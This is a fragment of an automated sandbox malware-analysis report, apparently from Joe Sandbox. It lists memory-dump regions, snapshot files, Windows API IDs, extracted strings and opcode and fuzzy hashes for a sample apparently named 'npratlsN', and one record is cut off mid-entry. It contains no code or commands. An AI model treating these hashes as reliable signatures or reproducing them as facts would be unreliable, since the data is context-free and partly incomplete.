                                                                                                                                                                          • API ID: AllocString_malloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 959018026-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.000000000043F000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_1_400000_npratlsN.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: nKvq
                                                                                                                                                                          • API String ID: 0-3625296599
                                                                                                                                                                          • Opcode ID: ad4b90cd10760c55cf030e7165fed12062fd99e8464ff89ff416c392fc6a9799
                                                                                                                                                                          • Instruction ID: c75cf1ef67d23f5bf252239fba73b533d06267ddefdb7b775224d53981cd8078
                                                                                                                                                                          • Opcode Fuzzy Hash: ad4b90cd10760c55cf030e7165fed12062fd99e8464ff89ff416c392fc6a9799
                                                                                                                                                                          • Instruction Fuzzy Hash: 4981C274E01219DFDB04DFA9D994ADEBBB2FF88300F10842AD919AB364DB356946CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: f36cf511ae8259a36ef5925e6415e9b05f0cfe1f156d18009ef1eec2194036e4
                                                                                                                                                                          • Instruction ID: 9c6dac474d1ec511cac22ffd48183621ad83ef87d3c5edb4ae95d2a0ef355898
                                                                                                                                                                          • Opcode Fuzzy Hash: f36cf511ae8259a36ef5925e6415e9b05f0cfe1f156d18009ef1eec2194036e4
                                                                                                                                                                          • Instruction Fuzzy Hash: 6281BE74E012699FDB65DF29C890BDDBBB2BF89300F1080EAD948A7254DB755E81CF80
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 8669767af6c8552bc07746d0f896442a3d7f1c095dd545b836ea59e1ca683342
                                                                                                                                                                          • Instruction ID: 6514ce8e691dab2f8567067132f410228a933cdeb959d235b9112787f13d3abd
                                                                                                                                                                          • Opcode Fuzzy Hash: 8669767af6c8552bc07746d0f896442a3d7f1c095dd545b836ea59e1ca683342
                                                                                                                                                                          • Instruction Fuzzy Hash: 9271A174E01218CFDB14DFA9D990AEDBBB2AF89300F249529D804BB395DB359986CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: a03995d3b6f0d38bcf03176a75081a7802b6cae8309cc21112835cb6b5d7f979
                                                                                                                                                                          • Instruction ID: 6e072bf7cae743be0110fa873279cbb7e9a04ff352a805ab0a8018c3ec0088db
                                                                                                                                                                          • Opcode Fuzzy Hash: a03995d3b6f0d38bcf03176a75081a7802b6cae8309cc21112835cb6b5d7f979
                                                                                                                                                                          • Instruction Fuzzy Hash: A371B174E01218CFDB14DFA9D990ADDBBB2AF89300F209529D805BB394DB359986CF54
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 047233eef0d412966e219eb5442b7bb43d8440c88ae3d60146b9f20c1e806c94
                                                                                                                                                                          • Instruction ID: e015fa71131ec3169fe88b295d1a909536031ddef8bd7058362f52292a10078a
                                                                                                                                                                          • Opcode Fuzzy Hash: 047233eef0d412966e219eb5442b7bb43d8440c88ae3d60146b9f20c1e806c94
                                                                                                                                                                          • Instruction Fuzzy Hash: AA71C174E00218CFDB04DFA9D990AEDBBF2AF89300F249529D405BB395DB399986CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: e81db8a432d4aa5ca1ba629e47b48387bc9496fa67d7cc4f13510b6a4467f775
                                                                                                                                                                          • Instruction ID: e84605c5a848e5cb32d6b4881b7ddb54fe6303f90f4ffd2383319fde2edeff3a
                                                                                                                                                                          • Opcode Fuzzy Hash: e81db8a432d4aa5ca1ba629e47b48387bc9496fa67d7cc4f13510b6a4467f775
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A71C374E00218CFDB14DFA9D990AEDBBB2BF89300F209529D404BB395DB359986CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (o^q
                                                                                                                                                                          • API String ID: 0-74704288
                                                                                                                                                                          • Opcode ID: 0dd733c2e6cb06d5d5094dbe802d4ba9a195dfa4762a8d412e2fcc825e991a61
                                                                                                                                                                          • Instruction ID: 753e6f039573e3eaae29df136ce9c2f4bb29599c6b313bbd21f2458adc3815fb
                                                                                                                                                                          • Opcode Fuzzy Hash: 0dd733c2e6cb06d5d5094dbe802d4ba9a195dfa4762a8d412e2fcc825e991a61
                                                                                                                                                                          • Instruction Fuzzy Hash: 8F41CF36B002548FCB059BB9D85869EBBB6FFC8311F244469E906D7391EF35AC01CB90
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 93585b700a4207f9e1a164712f0ededded46d43a0c2b18f61e3c82882b8a382c
                                                                                                                                                                          • Instruction ID: 3bdab2774aad3b603a06dfc4ea90a09adbd838cb1104fa9717587d8013218f34
                                                                                                                                                                          • Opcode Fuzzy Hash: 93585b700a4207f9e1a164712f0ededded46d43a0c2b18f61e3c82882b8a382c
                                                                                                                                                                          • Instruction Fuzzy Hash: C031D074E01259CBDF18DFAAD9406DEBBF2AF89300F10D17AD418AB294DB35A946CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: c97179087f052a5f4e41664c703707886c1a4f5d624492546b394812a133a8c7
                                                                                                                                                                          • Instruction ID: 1fe974b373a1f1682a639a7088f52fef544e18ad54fcb130eedf4c5cc73f965c
                                                                                                                                                                          • Opcode Fuzzy Hash: c97179087f052a5f4e41664c703707886c1a4f5d624492546b394812a133a8c7
                                                                                                                                                                          • Instruction Fuzzy Hash: ED310370E01258CBDB18CFAAD8406DEFBF2AF89300F20D56AD418BB254EB355946CF55
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 9f823b85e868a4d7a64c51ef46dec0b4136b32f3ae0c308966abfad9c39e5c0c
                                                                                                                                                                          • Instruction ID: ab406c96e686597e275b343a13767aa6ae9f46b4538fc40995a0653a5a948b38
                                                                                                                                                                          • Opcode Fuzzy Hash: 9f823b85e868a4d7a64c51ef46dec0b4136b32f3ae0c308966abfad9c39e5c0c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4931D274E012088BDB14DFAAD5506DEFBF3AF89300F24D529D408BB255EB356A46CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 8e1d37e2de8d6aa777fadd443364977c021951fe9675d8bd52f34f73ad32ab1d
                                                                                                                                                                          • Instruction ID: 138d7d50a83c35ea5e6321ecf7fa8feb0cab7adbba9664e7d3a1a3943f428898
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e1d37e2de8d6aa777fadd443364977c021951fe9675d8bd52f34f73ad32ab1d
                                                                                                                                                                          • Instruction Fuzzy Hash: D931C275E01218CBDB08CFAAD9406DEFBF2AF89340F10D129D419BB258DB345946CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3074843279.00000000285F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 285F0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_285f0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9e4081482cd4e948b2b7405fa548a981f99e61ee92560a99f2e00c59797ec6b4
                                                                                                                                                                          • Instruction ID: 6cd2ac0e86a9873ff89fcabb195993a66180ecbbe285c212f8d6aa1a19aafbaf
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e4081482cd4e948b2b7405fa548a981f99e61ee92560a99f2e00c59797ec6b4
                                                                                                                                                                          • Instruction Fuzzy Hash: A251B374E01219DFCB44DFA9D594ADEBBF2FF88300F208429D515AB350DB346A45CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8c8d2ab1692d95abb6268d3859f6a44fa556a6ce3ade53093464ce742838803a
                                                                                                                                                                          • Instruction ID: 2e899cc4c6dce50b33888b4d856b0a4087a8f597930f22d186e38ab540ad3252
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c8d2ab1692d95abb6268d3859f6a44fa556a6ce3ade53093464ce742838803a
                                                                                                                                                                          • Instruction Fuzzy Hash: E8511474E05249CFCB04DFA9D594ADDBBF6BF49300F20912AE805B7250DB799A4ACF44
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 73424118f581ff5ab4988fb48b86173b3189d326bb683387b10876e011bd2e21
                                                                                                                                                                          • Instruction ID: 5d7dac5889c402e1189dfbbabe15b7d336ed85e958211c3f0a8c99afd3c1b793
                                                                                                                                                                          • Opcode Fuzzy Hash: 73424118f581ff5ab4988fb48b86173b3189d326bb683387b10876e011bd2e21
                                                                                                                                                                          • Instruction Fuzzy Hash: CA51B131E00219DBDB05CFA9C990ADEBBF1BF89710F248629E505B7390DB30AD46CB91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 738c76add4bf4f8c259273117608771115f4b9c359b551cf89124ddd97959d98
                                                                                                                                                                          • Instruction ID: cf765831bc62d3de8d6f0776f6bb0fac4a5696c37e873e2c4a48ab6b779a950d
                                                                                                                                                                          • Opcode Fuzzy Hash: 738c76add4bf4f8c259273117608771115f4b9c359b551cf89124ddd97959d98
                                                                                                                                                                          • Instruction Fuzzy Hash: 8751A574E01309CFCB08DFA9D59499DBBB2FF89315F209169E805AB364DB35A942CF50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4ca186510ed5fe4985da192081dd817bd08fe8ab3f7a9afe34e4020b6454612a
                                                                                                                                                                          • Instruction ID: 0682975002fbe0b49a67fac2d555689eb0a797c899ac300fea73f31cbe340554
                                                                                                                                                                          • Opcode Fuzzy Hash: 4ca186510ed5fe4985da192081dd817bd08fe8ab3f7a9afe34e4020b6454612a
                                                                                                                                                                          • Instruction Fuzzy Hash: 3951A731E05219DFDB15CFA9C990ADEBBB1AF85700F24C52AE505B7390EB30AD46CB91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0b46a267fd84d277adbb07642c0864b005b1f23e7af0d8b0c228695453307295
                                                                                                                                                                          • Instruction ID: 29e417556810153b85f667e54cd7b1cad878fb3f31904071af3160eb205a6bc5
                                                                                                                                                                          • Opcode Fuzzy Hash: 0b46a267fd84d277adbb07642c0864b005b1f23e7af0d8b0c228695453307295
                                                                                                                                                                          • Instruction Fuzzy Hash: 4141A231E00219DBDB05CFA9C990ADEB7F1AF88700F248529E515B7390DB30AD46CB95
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 359262b7bd171428e4296bf92671b58ddf056b73dfbd963be89493b196fe66c7
                                                                                                                                                                          • Instruction ID: 891a602f6c2f8bb8ca1ca6a2b84bc213cdaaa3bc1a0bffb140d961b3d0885b6b
                                                                                                                                                                          • Opcode Fuzzy Hash: 359262b7bd171428e4296bf92671b58ddf056b73dfbd963be89493b196fe66c7
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A415D35A04259DFCF42CFA5C849B8EBFB2EF89314F048159FA559B292D731EA14CB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 382e9dc91b98a746ae50d1cb2a0feacd7ed99ea3fc2d473d50bcfb8a42ed7967
                                                                                                                                                                          • Instruction ID: 27e0c3bf17a5d43f1cfbd0cd63a61e296d7c35211c8205aba766418f4b299d0d
                                                                                                                                                                          • Opcode Fuzzy Hash: 382e9dc91b98a746ae50d1cb2a0feacd7ed99ea3fc2d473d50bcfb8a42ed7967
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A4165B4D01259DFCB00CFA9D584A9EFBF1AF09310F24902AE918AB220D375AA46CF54
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 54b786ff58db2fddaad0c8267ee18bea54bb1ee05b6a15b455ddbe382efb18de
                                                                                                                                                                          • Instruction ID: 9070441f9e9f2600a481d6f7c3020e56068b7c7bd3d1ee4518f151dd6318a162
                                                                                                                                                                          • Opcode Fuzzy Hash: 54b786ff58db2fddaad0c8267ee18bea54bb1ee05b6a15b455ddbe382efb18de
                                                                                                                                                                          • Instruction Fuzzy Hash: 854167B9D042589FCF00CFA9D584A9EFBF1AB19310F10A42AE914BB310D375AA41CF68
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9ec073094c6645e12b0043181fe4c6ecea5e4be855f2dbf0c189f85746438b76
                                                                                                                                                                          • Instruction ID: b77d3f67c45a28ac048a3f42ca30a93e58914045ed4b80615bc8866082ede00a
                                                                                                                                                                          • Opcode Fuzzy Hash: 9ec073094c6645e12b0043181fe4c6ecea5e4be855f2dbf0c189f85746438b76
                                                                                                                                                                          • Instruction Fuzzy Hash: 544168B9D042589FDF10CFA9D584ADEFBF1AB19310F14A42AE914BB310D335AA41CF68
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7429ff5f25b305ba96bba315b707ce64c5e42858c57f77eeda5530a17a420d75
                                                                                                                                                                          • Instruction ID: aa7684d05fea4c0c01697783ce6c664bd92a5f69e4b4c925d07836e948b62497
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d297380405d1481a7a331073af8c05f5338dab51687143b468379b01274668c5
                                                                                                                                                                          • Instruction ID: 562bf5753ab42f11f15d0385e56987eafbabd44d5e0be1f5a4fbc02fe7071836
                                                                                                                                                                          • Opcode Fuzzy Hash: d297380405d1481a7a331073af8c05f5338dab51687143b468379b01274668c5
                                                                                                                                                                          • Instruction Fuzzy Hash: D021E378D042598FCB41EFA9D8485EEBFF1BF49300F10526AE40AB3254EB346A45CFA1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3073747055.000000002853D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2853D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2853d000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
                                                                                                                                                                          • Instruction ID: 189f6880e7da3185415747df2b8f3799ad5f726b1cd468fb4d1a0dbca4b5bd0e
                                                                                                                                                                          • Opcode Fuzzy Hash: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
                                                                                                                                                                          • Instruction Fuzzy Hash: 9F11B176505280CFCB02CF10D9C4B16BF72FB98314F24C5A9E9090B256C336E55ACBA1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c06b40125b457c37c1b7cfe659535accd6edd592e03f725e1f701aaa92e5e28f
                                                                                                                                                                          • Instruction ID: d62a0ee61849a377094e2f7833748b6a7cafa5868980012f84795d3b738461d5
                                                                                                                                                                          • Opcode Fuzzy Hash: c06b40125b457c37c1b7cfe659535accd6edd592e03f725e1f701aaa92e5e28f
                                                                                                                                                                          • Instruction Fuzzy Hash: 42217270D002099FDB40EFB9D950A8EBBF2FB84300F00D569D005AB355EB746A49CF91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1185f2fc90c3bbfa7ac876bd45e9590a5de8e135b3eaa89c35cde311a8d4e43e
                                                                                                                                                                          • Instruction ID: 35e0b674a286bab5c79010b3aeea5a0b9ef4a1c41cb0a2d6efcba84de05eeddb
                                                                                                                                                                          • Opcode Fuzzy Hash: 1185f2fc90c3bbfa7ac876bd45e9590a5de8e135b3eaa89c35cde311a8d4e43e
                                                                                                                                                                          • Instruction Fuzzy Hash: AF112778E00199CFDB10CFB8E950B9EBBB1AB88314F10D461E908EB349EB3099418B51
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3074012503.000000002854D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2854D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2854d000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 021c8d7180bca40b1b4a0da321e6e5f783d7625571517dbbd39f1422581fcb41
                                                                                                                                                                          • Instruction ID: a27a8937135c6efeead67e34c02448e99bf81a12c7fa0a740b225f5cd460da7d
                                                                                                                                                                          • Opcode Fuzzy Hash: 021c8d7180bca40b1b4a0da321e6e5f783d7625571517dbbd39f1422581fcb41
                                                                                                                                                                          • Instruction Fuzzy Hash: 83118B75904284DFDB01CF10D9C4B06FBA2FB88314F24C6AED8494B656C33AE54BCB62
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9375ecdaafeba694757cd62074e758be2ec1f7690b53dd2e16816d5e3c578779
                                                                                                                                                                          • Instruction ID: d7f4bc8cc2025cf215efad91f1c59dea47c91932daa7efa8bedd450a2b11ee11
                                                                                                                                                                          • Opcode Fuzzy Hash: 9375ecdaafeba694757cd62074e758be2ec1f7690b53dd2e16816d5e3c578779
                                                                                                                                                                          • Instruction Fuzzy Hash: D7117C75D0425E8FCF01DFA4D9448EEBBB4FF5A314F10026AE859B7220EB316A55CBA1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 86806db8c2aface2344aa43beb6e9fe397aed73cd4de0a83eddd4019d900ccc0
